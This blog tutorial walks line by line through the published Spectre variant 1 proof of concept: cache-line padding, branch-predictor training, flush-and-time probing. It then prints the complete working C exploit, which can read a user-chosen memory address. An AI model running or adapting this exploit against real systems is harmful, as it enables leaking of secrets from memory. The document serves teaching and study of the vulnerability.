Intel: Spectre & Meltdown Side-Channel Attacks (Part 2)

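The previous post covered the basic principles of Spectre & Meltdown along with a simple demo. This post studies the original PoC published by the team that discovered the vulnerability: https://spectreattack.com/spectre.pdf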

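1. First, the result of a run, to give an intuitive picture: as the printed output shows, the program successfully guesses the contents of the secret string.

2. Now a detailed walk through the code.

(1) The two functions at the heart of the exploit, rdtscp and clflush, are declared in these headers (intrin.h under MSVC, x86intrin.h otherwise):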

#ifdef _MSC_VER

#include <intrin.h> /* for rdtscp and clflush */

#pragma optimize("gt", on)

#else

#include <x86intrin.h> /* for rdtscp and clflush */

#endif

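(2) array1: the array through which the attacker reaches the victim's memory. It is declared with 160 bytes, and the bounds check in victim_function compares the index against array1_size (16). Later a very large index is passed in to step far outside the array and read the victim's memory.

unused1 and unused2: on a multi-core CPU each core has its own L1 and L2 cache, and the cache is managed in lines of 64 bytes each on the processors named in the code comments. unused1 and unused2 fill exactly one cache line each and array1 (160 bytes) spans 3 cache lines, so these three arrays occupy 5 different cache lines (assuming they start on a line boundary). The padding keeps array1 from sharing a cache line with its neighbours.

array2: the probe array. Each unit of the secret is 1 byte and can therefore take 256 different values (0 to 255), which gives the first dimension, 256. The second dimension, 512, is the stride in bytes between the slots of two consecutive values. It is larger than a 64-byte (512-bit) cache line, so every possible byte value maps to its own cache line.

uint8_t unused1[64]; // padding to ensure we hit different cache lines; on many processors (e.g. Intel i3, i5, i7, ARM Cortex A53) the L1 cache has 64 bytes per line
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; // memory shared between the victim and the attacker
uint8_t unused2[64]; // padding, same purpose as unused1
uint8_t array2[256 * 512]; // (1) each unit of the secret is 1 byte, so there are 256 possible values; (2) a cache line is 64 bytes = 512 bits, and the 512-byte stride gives each value its own cache line; (3) shared between the attacker and the victim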
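To make the layout arithmetic concrete, here is a minimal sketch that counts the cache lines an array spans and computes which line holds the probe slot of a given byte value. The 64-byte line size is the figure quoted in the code comments, the counts assume each array starts on a line boundary, and the helper names `lines_spanned` and `probe_line` are hypothetical, not part of the PoC.

```c
#include <assert.h>
#include <stddef.h>

#define CACHE_LINE 64   /* assumed line size, as quoted in the PoC comments */
#define STRIDE     512  /* byte distance between two probe slots of array2 */

/* Number of cache lines covered by `bytes` bytes that start on a line boundary. */
static size_t lines_spanned(size_t bytes)
{
    return (bytes + CACHE_LINE - 1) / CACHE_LINE;
}

/* Index of the cache line (relative to the start of array2) that holds
   the probe slot for byte value v. */
static size_t probe_line(unsigned v)
{
    assert(v < 256);
    return ((size_t)v * STRIDE) / CACHE_LINE;
}
```

Under these assumptions `lines_spanned(64)` is 1, `lines_spanned(160)` is 3, and `probe_line(v)` is `8 * v`, so two different byte values never land on the same line.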

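(3) This is the victim's data, i.e. the data to be recovered:

char* secret = "The Magic Words are Squeamish Ossifrage."; // known only to the victim; this is what the attacker is trying to recover

(4) array1 is declared with 160 bytes and the check only admits x < array1_size, but at certain points a far larger value is passed in. The speculative out-of-bounds read then touches the secret, and the dependent access to array2 pulls a line into the cache. Even though the if condition turns out to be false and the CPU rolls back the register state, the cached line stays in place.

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time */

// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
    if (x < array1_size) // array1_size is not cached and must be fetched from memory, which is slow, so the CPU runs ahead and executes the statement below speculatively
    {
        temp &= array2[array1[x] * 512]; // array1 holds 160 bytes, but x can be far larger (e.g. malicious_x defined in main), which reaches into the memory where secret is stored
    }
}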

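(5) The threshold for deciding whether an access hit the cache. This value was found through repeated experiments rather than derived from theory:

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; 80 was found by repeated experiments, not derived from theory */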
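Since the threshold is empirical, it has to be measured again on each machine. The following is a minimal sketch of one way to do that, not the method used by the PoC authors: time a read of a cached line and of a flushed line many times, take the median of each, and pick a value in between. The names `time_read`, `median_latency` and `suggest_threshold`, the sample count and the midpoint rule are all assumptions made for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#ifdef _MSC_VER
#include <intrin.h>     /* for rdtscp, clflush and mfence */
#else
#include <x86intrin.h>  /* for rdtscp, clflush and mfence */
#endif

#define SAMPLES 1001

static uint8_t probe[4096];

/* Time one read of *p in TSC ticks; if `flush` is nonzero the line is evicted first. */
static uint64_t time_read(volatile uint8_t *p, int flush)
{
    unsigned int aux;
    uint64_t start;
    if (flush)
        _mm_clflush((const void *)p);
    else
        (void)*p;           /* touch the line so that it is cached */
    _mm_mfence();
    start = __rdtscp(&aux);
    (void)*p;               /* the access being timed */
    return __rdtscp(&aux) - start;
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median latency over SAMPLES reads, cached (flush = 0) or flushed (flush = 1). */
static uint64_t median_latency(int flush)
{
    static uint64_t t[SAMPLES];
    assert(flush == 0 || flush == 1);
    for (int i = 0; i < SAMPLES; i++)
        t[i] = time_read(&probe[2048], flush);
    qsort(t, SAMPLES, sizeof t[0], cmp_u64);
    return t[SAMPLES / 2];
}

/* Hypothetical heuristic: put the threshold halfway between the two medians. */
static uint64_t suggest_threshold(void)
{
    return (median_latency(0) + median_latency(1)) / 2;
}
```

The measured numbers depend on the CPU, the clock frequency and whether the code runs inside a virtual machine, so the result should be treated as a starting point and compared against the 80 used above.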

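(6) Reset the array that records the cache-hit counts:

for (i = 0; i < 256; i++)
    results[i] = 0;

(7) Flush every probe slot of array2 from the CPU cache, so that lines already cached cannot distort the timing that follows:

for (i = 0; i < 256; i++) // flush the cache line of every slot
    _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */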

(8) Evict array1_size from the CPU cache. The empty loop right after it makes sure that the flush has completed:

_mm_clflush(&array1_size); // evict array1_size from the cache
for (volatile int z = 0; z < 100; z++) // ensure the flush is done and the processor does not reorder it; volatile keeps the compiler from optimizing the empty loop away
{ /* Delay (mfence can be used instead) */
}
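The comment says that mfence can stand in for the delay loop. A minimal sketch of that variant, assuming `_mm_mfence()` from the same intrinsics headers. `flush_array1_size` is a hypothetical helper, and whether the fence works as well as the delay loop on a particular CPU is something to confirm by experiment.

```c
#include <assert.h>
#ifdef _MSC_VER
#include <intrin.h>     /* for clflush and mfence */
#else
#include <x86intrin.h>  /* for clflush and mfence */
#endif

unsigned int array1_size = 16;

/* Evict array1_size from the cache and wait for the flush with a fence
   instead of the 100-iteration delay loop. */
static void flush_array1_size(void)
{
    _mm_clflush(&array1_size);
    _mm_mfence();   /* Intel documents clflush as ordered by mfence */
}
```

The flush changes only where the value lives, not the value itself: after the call, array1_size still reads as 16, but the next read has to go to memory.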

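(9) Here the offset into array1 is computed. The method is convoluted and hard to follow from the code alone, so it helps to print some values first:

x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));

The resulting x values follow a regular pattern with a period of 6. In each cycle the first 5 values of x equal training_x (7 in the trace below), which is within array1_size, so the if condition holds. The last one is far larger than array1_size, so the condition fails. But the CPU has a branch predictor, which predicts the outcome of a branch from the recent history of that branch and of nearby branches. Because the previous 5 executions took the branch, the CPU is "induced" to assume the 6th will too, and it speculatively executes temp &= array2[array1[x] * 512], which loads a cache line selected by the victim's memory into the CPU cache. Each x is then passed to victim_function().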

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
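The trace can be reproduced in isolation. Below is a minimal sketch that wraps the three bit-twiddling statements in a function, so the selection rule (malicious_x when j % 6 == 0, training_x otherwise) can be checked without running the attack. The wrapper name `select_x` is hypothetical; the three statements are the ones from the PoC.

```c
#include <assert.h>
#include <stddef.h>

/* Returns malicious_x when j % 6 == 0 and training_x otherwise, without a branch. */
static size_t select_x(int j, size_t training_x, size_t malicious_x)
{
    size_t x;
    assert(j >= 0);               /* the loop counter never goes negative */
    x = ((j % 6) - 1) & ~0xFFFF;  /* j%6==0: int -1 & ~0xFFFF, sign-extended on assignment; otherwise 0..4 -> 0 */
    x = (x | (x >> 16));          /* fill in the low 16 bits: all ones, or still 0 */
    return training_x ^ (x & (malicious_x ^ training_x)); /* all-ones mask yields malicious_x, zero mask yields training_x */
}
```

With training_x = 7, `select_x(18, ...)` and `select_x(12, ...)` return malicious_x while j = 23 down to 19 return 7, which matches the printed trace. Avoiding an if statement here matters because, as the PoC comment puts it, a jump could tip off the branch predictor.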

(10) After victim_function has run, read from array2 again and time each read. The slot with the shortest access time reveals the byte stored in the victim:

/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++)
{
    mix_i = ((i * 167) + 13) & 255; // 1. shuffle the read order so the CPU cannot predict and optimize the accesses; 2. & 255 (0xFF) keeps only the low 8 bits, which is equivalent to % 256
    addr = &array2[mix_i * 512];
    time1 = __rdtscp(&junk); /* READ TIMER */
    junk = *addr; /* MEMORY ACCESS TO TIME */
    time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
    if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) // skip the value that the training runs brought into the cache
        results[mix_i]++; /* cache hit - add +1 to score for this value */
}
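The scrambled index only works if every slot is still visited exactly once. A minimal sketch that checks this property of the expression ((i * 167) + 13) & 255. The function names `mix` and `mix_is_permutation` are hypothetical helpers, not part of the PoC.

```c
#include <assert.h>
#include <string.h>

/* The PoC's index scrambler: maps i in 0..255 to a shuffled index in 0..255. */
static int mix(int i)
{
    assert(i >= 0 && i < 256);
    return ((i * 167) + 13) & 255;
}

/* Returns 1 if mix() visits every value in 0..255 exactly once, else 0. */
static int mix_is_permutation(void)
{
    unsigned char seen[256];
    memset(seen, 0, sizeof seen);
    for (int i = 0; i < 256; i++) {
        int m = mix(i);
        if (seen[m])
            return 0;   /* a repeat would mean some slot is never timed */
        seen[m] = 1;
    }
    return 1;
}
```

The check succeeds because 167 is odd and therefore has no common factor with 256, so multiplying by it modulo 256 is a bijection and adding 13 only rotates the result.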

(11) Next, find the two values with the highest hit counts:

/* Locate highest & second-highest results tallies in j/k */
j = k = -1;
for (i = 0; i < 256; i++)
{
    if (j < 0 || results[i] >= results[j])
    {
        k = j;
        j = i;
    }
    else if (k < 0 || results[i] >= results[k])
    {
        k = i;
    }
}
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
    break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
} /* end of the tries loop */

results[0] ^= junk; /* use junk so code above won't get optimized out */
value[0] = (uint8_t)j;
score[0] = results[j];
value[1] = (uint8_t)k;
score[1] = results[k];
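The selection step is easier to follow on a small array. Below is a minimal sketch that lifts the same single-pass logic and the early-exit rule into two functions. The names `top_two` and `clear_winner` and the parameter `n` are hypothetical; the comparisons are the ones used in the PoC.

```c
#include <assert.h>

/* Writes the index of the highest tally to *best and of the runner-up to *second. */
static void top_two(const int results[], int n, int *best, int *second)
{
    int j = -1, k = -1;
    assert(n >= 2);
    for (int i = 0; i < n; i++) {
        if (j < 0 || results[i] >= results[j]) {
            k = j;      /* the old best becomes the runner-up */
            j = i;
        } else if (k < 0 || results[i] >= results[k]) {
            k = i;
        }
    }
    *best = j;
    *second = k;
}

/* The PoC's early-exit rule: the best tally clearly dominates the runner-up. */
static int clear_winner(int best_score, int second_score)
{
    return best_score >= (2 * second_score + 5) ||
           (best_score == 2 && second_score == 0);
}
```

For the tallies {0, 3, 9, 1, 4, 2} this picks index 2 as the best guess and index 4 as the runner-up. No sorting is involved: one pass over the 256 counters is enough because only the top two matter.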

(12) On to main. This is the offset from array1 to the target memory:

size_t malicious_x = (size_t)(secret - (char*)array1);

It is then passed to readMemoryByte, which probes the content one byte at a time:

printf("Reading at malicious_x = %p... ", (void*)malicious_x);
readMemoryByte(malicious_x++, value, score);
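The value malicious_x=18446744073707453224 in the trace above equals 2^64 - 2098392, which means that in that run secret sat 2098392 bytes below array1 and the offset wrapped around as an unsigned number. A minimal sketch of that arithmetic, done on integers so that the wrap-around is well defined. The helper names `offset_from` and `address_at` are hypothetical, and the sketch assumes a flat address space in which size_t and uintptr_t have the same width.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offset that, added to the address of `base`, lands on `target`.
   The subtraction is done on integers, so a target below base simply wraps. */
static size_t offset_from(const void *base, const void *target)
{
    assert(base != NULL && target != NULL);
    return (size_t)((uintptr_t)target - (uintptr_t)base);
}

/* Address reached by indexing `base` with offset x, again in wrapping arithmetic. */
static uintptr_t address_at(const void *base, size_t x)
{
    return (uintptr_t)base + x;
}
```

Whatever the relative placement of the two objects, `address_at(array1, offset_from(array1, secret))` gives back the address of secret, and incrementing the offset by one moves to the next byte of the string, which is what the `malicious_x++` in the loop relies on.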

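(13) Compared with the PoC in https://www.cnblogs.com/theseventhson/p/13282921.html, this demo adds two features:

First, it trains (induces) the CPU's branch predictor into assuming that the next if condition holds, so that the if body is executed ahead of time.
Second, it can probe not only the secret string but also a target address and length chosen by the user, as follows:

if (argc == 3) // the first argument is the target address, the second is the number of bytes to read
{
    sscanf_s(argv[1], "%p", (void**)(&malicious_x));
    malicious_x -= (size_t)array1; /* convert the input address into an offset relative to array1 */
    sscanf_s(argv[2], "%d", &len);
    printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
}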

The complete code follows (the key points are in the comments):

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers */
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64]; // padding to ensure we hit different cache lines; on many processors (e.g. Intel i3, i5, i7, ARM Cortex A53) the L1 cache has 64 bytes per line
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; // memory shared between the victim and the attacker
uint8_t unused2[64]; // padding, same purpose as unused1
uint8_t array2[256 * 512]; // (1) each unit of the secret is 1 byte, so there are 256 possible values; (2) a cache line is 64 bytes = 512 bits, and the 512-byte stride gives each value its own cache line; (3) shared between the attacker and the victim

char* secret = "The Magic Words are Squeamish Ossifrage."; // known only to the victim; this is what the attacker is trying to recover

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time */

// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
    if (x < array1_size) // array1_size is not cached and must be fetched from memory, which is slow, so the CPU runs ahead and executes the statement below speculatively
    {
        temp &= array2[array1[x] * 512]; // array1 holds 160 bytes, but x can be far larger (e.g. malicious_x defined in main), which reaches into the memory where secret is stored
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; 80 was found by repeated experiments, not derived from theory */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
    static int results[256]; // cache-hit count for each candidate byte value
    int tries, i, j, k, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t* addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;

    for (tries = 999; tries > 0; tries--)
    {
        /* Flush array2[512*(0..255)] from cache */
        for (i = 0; i < 256; i++) // flush the cache line of every slot
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size; // training_x = 0..15
        for (j = 29; j >= 0; j--)
        {
            _mm_clflush(&array1_size); // evict array1_size from the cache
            for (volatile int z = 0; z < 100; z++) // ensure the flush is done and the processor does not reorder it; volatile keeps the compiler from optimizing the empty loop away
            { /* Delay (mfence can be used instead) */
            }

            /* Out of every 6 iterations, 5 produce a small x for which the if condition holds; the 6th produces a huge x for which it fails, but because the previous 5 passed, the CPU still executes the if body speculatively. The 5 small values train the branch predictor so that the 6th can "fool" it. */
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x); // x is an offset relative to array1 and can reach into the secret string
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {
            mix_i = ((i * 167) + 13) & 255; // 1. shuffle the read order so the CPU cannot predict and optimize the accesses; 2. & 255 (0xFF) keeps only the low 8 bits, which is equivalent to % 256
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) // skip the value that the training runs brought into the cache
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }

    results[0] ^= junk; /* use junk so code above won't get optimized out */
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
}

int main(int argc, const char** argv)
{
    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));
    size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x: the distance from array1 to the secret string; it wraps around as size_t when secret lies below array1 */
    int score[2], len = (int)strlen(secret);
    uint8_t value[2];

    for (size_t i = 0; i < sizeof(array2); i++) // array2[256 * 512]
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

    if (argc == 3) // the first argument is the target address, the second is the number of bytes to read
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* convert the input address into an offset relative to array1 */
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0)
    {
        printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X='%c' score=%d)", value[1],
                (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                score[1]);
        printf("\n");
    }

#ifdef _MSC_VER
    printf("Press ENTER to exit\n");
    getchar(); /* Pause Windows console */
#endif
    return (0);
}

References:

https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre (code walkthrough)

https://bbs.pediy.com/thread-254288.htm and https://xz.aliyun.com/t/6332 (leaking sensitive information across processes)

https://bbs.pediy.com/thread-256190.htm (side-channel analysis of the Intel L3 cache)
